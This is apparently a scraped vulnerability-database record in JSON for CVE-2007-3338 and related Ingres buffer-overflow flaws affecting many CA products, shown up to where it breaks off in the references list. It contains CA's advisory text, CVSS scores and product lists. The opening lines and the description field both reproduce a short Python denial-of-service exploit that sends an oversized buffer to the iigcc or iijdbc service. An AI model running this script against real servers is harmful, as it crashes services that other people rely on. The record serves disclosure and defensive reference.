Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
Date: 2010-08-14
Author: fdisk
Version: 2.6
Tested on: Windows 2003 Server SP1 en
CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
Notes: Fixed in the last version.
please let me know if you are/were able to get code execution
import socket import sys
if len(sys.argv) != 4: print "Usage: ./CAAdvantageDoS.py " print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
host = sys.argv[1] port = int(sys.argv[2]) service = sys.argv[3]
if service == "iigcc": payload = "\x41" * 2106 elif service == "iijdbc": payload = "\x41" * 1066 else: print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
payload += "\x42" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data)
print service + " crashed"
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200706-0399",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "database server",
"scope": "eq",
"trust": 2.4,
"vendor": "ingres",
"version": "r3"
},
{
"model": "database server",
"scope": "eq",
"trust": 2.4,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "database server",
"scope": "eq",
"trust": 1.6,
"vendor": "ingres",
"version": "9.0.4"
},
{
"model": "database server",
"scope": "eq",
"trust": 1.6,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "database server",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "2006 9.0.4"
},
{
"model": "database server",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "and 2.5"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20060"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "3.0.3"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "associates wily soa manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates unicenter workload control center 1.0.sp4",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter workload control center sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng 2.4.2j",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.5"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter patch management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1.1"
},
{
"model": "associates unicenter lightweight portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2"
},
{
"model": "associates unicenter job management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter enterprise job manager sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter desktop management suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter desktop and server management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter database command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.11"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2.1"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.3"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter asset intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter advanced systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates etrust web access control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust network forensics",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust iam suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust audit r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates docserver",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath aion bre",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates brightstor storage resource manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor storage command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor enterprise backup for tru64",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for hp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for aix",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.0"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates advantage data transformer",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004029"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-380"
},
{
"db": "NVD",
"id": "CVE-2007-3338"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ingres:database_server",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004029"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSEChris Anley\u203b chris@ngssoftware.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-380"
}
],
"trust": 0.6
},
"cve": "CVE-2007-3338",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2007-3338",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-3338",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2007-3338",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200706-380",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004029"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-380"
},
{
"db": "NVD",
"id": "CVE-2007-3338"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple stack-based buffer overflows in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allow remote attackers to execute arbitrary code via the (1) uuid_from_char or (2) duve_get_args functions. \nSuccessful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the \u0027alarkp.def\u0027 file. \nTitle: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed \nIngres Multiple Vulnerabilities\n\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\n\nCA Advisory Date: 2007-06-21\n\nReported By: NGSSoftware, and iDefense\n\nImpact: Attackers can potentially execute arbitrary code, or \noverwrite files. CA has issued fixes, to address all of \nthese vulnerabilities, for all supported CA products that may be \naffected. \n\n1) Ingres controllable pointer overwrite vulnerability (reported \nby NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450]\nDescription: An unauthenticated attacker can potentially execute \narbitrary code within the context of the database server. \n\n3) Ingres wakeup file overwrite (reported by NGSSoftware) \n[Ingres bug 115913, CVE-2007-3337, CAID 35451]\nDescription: The \"wakeup\" binary creates a file named \n\"alarmwkp.def\" in the current directory, truncating the file if it \nalready exists. The \"wakeup\" binary is setuid \"ingres\" and \nworld-executable. Consequently, an attacker can truncate a file \nwith the privileges of the \"ingres\" user. \n\n4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: An attacker can pass a long string as an argument to \nuuid_from_char() to cause a stack buffer overflow and the saved \nreturned address can be overwritten. \n\n5) Ingres verifydb local stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: A local attacker can exploit a stack overflow in the \nIngres verifydb utility duve_get_args function. \n\n6) Communication server heap corruption (reported by iDefense) \n[Ingres bug 117523, CVE-2007-3334, CAID 35453]\nDescription: An attacker can execute arbitrary code within the \ncontext of the communications server (iigcc.exe). This only \naffects Ingres on the Windows operating system. Reported by \niDefense as IDEF2023. \n\n7) Data Access/JDBC server heap corruption (reported by iDefense) \n[Ingres bug 117523, CVE-2007-3334, CAID 35453]\nDescription: An attacker can execute arbitrary code within the \ncontext of the Data Access server (iigcd.exe) in r3 or the JDCB \nserver in older releases. This only affects Ingres on the Windows \noperating system. Reported by iDefense as IDEF2022. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a cumulative High \nrisk rating. \n\nAffected Products:\nAdvantage Data Transformer r2.2\nAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1\nAllFusion Harvest Change Manager r7, r7.1\nBrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, \n Linux and Mainframe Linux)\nBrightStor ARCserve Backup for Laptops and Desktops r11.5\nBrightStor Enterprise Backup (Unix only) r10.5\nBrightStor Storage Command Center r11.5\nBrightStor Storage Resource Manager r11.5\nCleverPath Aion Business Rules Expert r10.1\nCleverPath Aion Business Process Monitoring r10.1\nCleverPath Predictive Analysis Server r3\nDocServer 1.1\neTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2\neTrust Audit r8 SP2\neTrust Directory r8.1\neTrust IAM Suite r8.0\neTrust IAM Toolkit r8.0, r8.1\neTrust Identity Manager r8.1\neTrust Network Forensics r8.1\neTrust Secure Content Manager r8\neTrust Single Sign-On r7, r8, r8.1\neTrust Web Access Control 1.0\nUnicenter Advanced Systems Management r11\nUnicenter Asset Intelligence r11\nUnicenter Asset Management r11\nUnicenter Asset Portfolio Management r11.2.1, r11.3\nUnicenter CCS r11\nUnicenter Database Command Center r11.1\nUnicenter Desktop and Server Management r11\nUnicenter Desktop Management Suite r11\nUnicenter Enterprise Job Manager r1 SP3, r1 SP4\nUnicenter Job Management Option r11\nUnicenter Lightweight Portal 2\nUnicenter Management Portal r3.1.1\nUnicenter Network and Systems Management r3.0, r11\nUnicenter Network and Systems Management - Tiered - Multi Platform \n r3.0 0305, r3.1 0403, r11.0\nUnicenter Patch Management r11\nUnicenter Remote Control 6, r11\nUnicenter Service Accounting r11, r11.1\nUnicenter Service Assure r2.2, r11, r11.1\nUnicenter Service Catalog r11, r11.1\nUnicenter Service Delivery r11.0, r11.1\nUnicenter Service Intelligence r11\nUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1\nUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, \n r11.1, r11.2\nUnicenter Software Delivery r11\nUnicenter TNG 2.4, 2.4.2, 2.4.2J\nUnicenter Workload Control Center r1 SP3, r1 SP4\nUnicenter Web Services Distributed Management 3.11, 3.50\nWily SOA Manager 7.1\n\nAffected Platforms:\nAll operating system platforms supported by the various CA \nproducts that embed Ingres. This includes Windows, Linux, and \nsupported UNIX platforms. \n\nStatus and Recommendation:\nCA recommends that customers apply the appropriate fix(es) listed \non the Security Notice page: \nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nCA SupportConnect Security Notice for these vulnerabilities:\nIngres Security Alert\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\nImportant Security Notice for Customers Using Products That Embed \nIngres\nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\nCA Security Advisor posting: \nCA Products That Embed Ingres Multiple Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453\nIngres knowledge base document:\nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl\nReported By: NGSSoftware, and iDefense\nNGSSoftware Advisory: \nhttp://www.ngssoftware.com/research/advisories/\niDefense Advisory: \nIngres Database Multiple Heap Corruption Vulnerabilities\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546\nCVE References:\nCVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities\n# Date: 2010-08-14\n# Author: fdisk\n# Version: 2.6\n# Tested on: Windows 2003 Server SP1 en\n# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338\n# Notes: Fixed in the last version. \n# please let me know if you are/were able to get code execution \u003crr dot fdisk at gmail dot com\u003e\n \nimport socket\nimport sys\n \nif len(sys.argv) != 4:\n print \"Usage: ./CAAdvantageDoS.py \u003cTarget IP\u003e \u003cPort\u003e \u003cService\u003e\"\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \nhost = sys.argv[1]\nport = int(sys.argv[2])\nservice = sys.argv[3]\n \nif service == \"iigcc\":\n payload = \"\\x41\" * 2106\nelif service == \"iijdbc\":\n payload = \"\\x41\" * 1066\nelse:\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \npayload += \"\\x42\" * 4\n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint \"Sending payload\"\ns.send(payload)\ndata = s.recv(1024)\ns.close()\nprint \u0027Received\u0027, repr(data)\n \nprint service + \" crashed\"\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3338"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004029"
},
{
"db": "BID",
"id": "24585"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-3338",
"trust": 2.9
},
{
"db": "BID",
"id": "24585",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "25756",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25775",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2288",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2290",
"trust": 1.6
},
{
"db": "OSVDB",
"id": "37483",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004029",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20070625 INGRES STACK OVERFLOW IN UUID_FROM_CHAR FUNCTION",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20070625 INGRES VERIFYDB LOCAL STACK OVERFLOW",
"trust": 0.6
},
{
"db": "XF",
"id": "34998",
"trust": 0.6
},
{
"db": "XF",
"id": "34995",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200706-380",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "57303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92818",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004029"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-380"
},
{
"db": "NVD",
"id": "CVE-2007-3338"
}
]
},
"id": "VAR-200706-0399",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2025-04-10T22:57:36.983000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Ingres Security Alert",
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004029"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004029"
},
{
"db": "NVD",
"id": "CVE-2007-3338"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"trust": 2.0,
